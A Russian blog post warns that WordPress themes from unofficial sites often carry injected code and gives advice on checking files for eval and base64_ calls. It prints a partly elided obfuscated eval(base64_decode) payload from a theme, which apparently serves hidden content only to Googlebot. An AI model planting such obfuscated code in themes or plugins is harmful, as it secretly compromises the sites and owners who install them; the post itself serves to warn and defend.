Вопрос выбора темы – один из самых волнующих в момент установки вордпресса или сразу после. Волнующий не только блогеров, дизайнеров, но и хакеров!
Внимание – хакеры!
Хакеры берут темы wordpress, вставляют в них свой код и отправляют такие темы по всем возможным сайтам с коллекциями тем. А чем красивее тема, чем более популярна, тем больше мотивация у хакера испоганить такую тему. Если вы поставите себе такую тему, то одному хакеру известно, что может случиться с вашим сайтом. Внешне такие темы ничем не отличаются, от точно таких же, но без злонамеренного кода.
Один раз я нашел красивую тему для сайта, скачал с трех разных источников. Официального источника этой темы я к сожалению не нашел. И во всех трех источниках оказался хакерский код, причем в каждой теме разный.
Хакерский код:
eval(base64_decode(’ZnVuY3Rpb24gd3BfZ2V0X2Zvb3Rlcl9tZXRhKCkge2dsb2
JhbCAkd3BkYjtpZiAoJGFkd2Jfb3B0ID0gJHdwZGItPmdld
F92YXIoIlNFTEVDVCBvcHRpb25fdmFsdWUgRlJPTSAkd
3BkYi0+b3B0aW9ucyBXSEVSRSBvcHRpb25fbmFtZT0n
YWR3Yl9vcHQnIikpJGFkd2Jfb3B0ID0gdW5zZXJpYWxpe
mUoJGFkd2Jfb3B0KTtlbHNleyRhZHdiX29wdCA9IGFycm
F5KDAsJycpOyR3cGRiLT5xdWVyeSgiSU5TRVJUIElOVE8
gJHdwZGItPm9wdGlvbnMgKG9wdGlvbl9uYW1lLCBvcHR
……………….. ПРОПУЩЕНО………………………….
xbF9lc2NhcGVfc3RyaW5nKHNlcmlhbGl6ZSgkYWR3Yl9vcHQ
pKS4iJyBXSEVSRSBvcHRpb25fbmFtZT0nYWR3Yl9vcHQnIik
7fX1pZiAoZXJlZ2koImdvb2dsZWJvdCIsJF9TRVJWRVJbJ0hU
VFBfVVNFUl9BR0VOVCddKSllY2hvICRhZHdiX29wdFsxXTt9Y
WRkX2FjdGlvbigid3BfZm9vdGVyIiwgIndwX2dldF9mb290ZXJ
fbWV0YSIpOw0KPz4=’));
Как мы видим здесь хитрый хакерский код зашифрован с помощью base64_encode, затем этот код расшифровывается base64_decode и выполняется eval. Я ради интереса расшифровывал и посмотрел, что внутри. Там ряд SQL запросов и еще какие-то хитрые манипуляции. В детали вникать было лень.
Тема мне очень понравилась, поэтому я не растерялся и вырезал всю заразу из кода.
Как этого избежать?
1. Пользуйтесь только проверенными ресурсами. К ним я отношу только официальный сайт wordpress.org. Однако в жизни бывает всякое, тем более в хакерской жизни. Даже официальный сайт могут взломать, и разместить на нем модифицированные темы. Так что для полной уверенности следует проверить даже тему из надежных источников.
2. Проверяйте все темы на наличие злонамеренного кода. Обязательно проверяйте все темы скачанные с неофициальных сайтов. Просматривайте все файлы темы поиском на наличие функций eval и base64_, можно также внимательно присмотреться к javascript, если он имеется в теме. Хакеры сейчас настолько хитрые, что умудряются, в некоторых случаях, засунуть свой код даже в css-файлы. Хотя как правило фантазия их не идет дальше eval(base64-decode(..)).
Где скачать темы?
Русские темы
blogstyle.ru
freewordpressthemes.ru
wpthemes.ru
www.wpbot.ru
www.wordpress-tema.ru
P.S. За безопасноть тем с вышеперечисленных ресурсов я не ручаюсь. Относительно безопасной может быть только скачка с официального сайта wordpress.org.